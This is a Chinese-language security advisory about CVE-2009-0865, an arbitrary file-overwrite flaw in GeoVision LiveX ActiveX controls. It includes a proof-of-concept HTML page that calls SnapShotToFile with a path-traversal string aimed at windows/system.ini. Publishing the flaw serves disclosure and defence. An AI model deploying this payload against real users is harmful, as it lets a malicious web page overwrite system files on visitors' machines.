安全研究
安全漏洞
GeoVision LiveX ActiveX控件SnapShotToFile()方式任意文件覆盖漏洞
发布日期:2009-02-16
更新日期:2009-02-17
受影响系统:
GeoVision LiveX ActiveX Control 8200描述:
GeoVision LiveX ActiveX Control 8120
GeoVision LiveX ActiveX Control 7000
BUGTRAQ ID: 33782
CVE(CAN) ID: CVE-2009-0865
GeoVision LiveX是用于管理GeoVision视频监控系统的软件。
GeoVision的LiveX_v7000(clsid {DA8484DE-52DB-4860-A986-61A8682E298A})和LiveX_v8120(clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F})ActiveX控件没有正确地验证对SnapShotToFile()和SnapShotX()方式输入的参数,如果用户受骗访问了恶意网页并向上述方式传送了恶意参数的话,就会导致向用户系统写入任意文件。
<*来源:SnoopyAssault (ipsdix@gmail.com)
链接:http://www.milw0rm.com/exploits/8059
http://secunia.com/advisories/33969/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<script language="JavaScript">
function sleep(n)
{
var now = new Date();
var exitTime = now.getTime() + (n*1000);
while (true) {
now = new Date();
if (now.getTime() > exitTime) return;
}
}
</script>
</head>
<body>
<object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300">
<param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server -->
<param name="DisablePWD" value="-1">
<param name="UserName" value="wec">
<param name="Password" value="">
<param name="CommandPort" value="4550">
<param name="DataPort" value="5550">
<param name="AudioDataPort" value="6550">
<param name="BandWidth" value="LAN">
<param name="FixSize" value="0">
<param name="FixWidth" value="320">
<param name="FixHeight" value="240">
<param name="SvrType" value="0">
<param name="AutoLogin" value="0">
<param name="DefaultCam" value="1">
<param name="AutoReConnect" value="-1">
<param name="MaxRetries" value="-1">
<param name="RetryInterval" value="70">
</object>
<script language="JavaScript">
sleep(2);
//WebCamX1.SetCntDeviceType(0);
//WebCamX1.EnableAutoScreenSize(1);
//WebCamX1.SetInfo(125,1,0,"","");
//WebCamX1.SetInfo(129,1,0,"","");
//WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0);
//WebCamX1.DefaultCam = 1;
WebCamX1.PlayX();
sleep(2);
WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini");
WebCamX1.SnapShotX();
</script>
</body>
</html>
建议:
厂商补丁:
GeoVision
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.geovision.com.cn/index.htm
浏览次数:2593
严重程度:0(网友投票)
绿盟科技给您安全的保障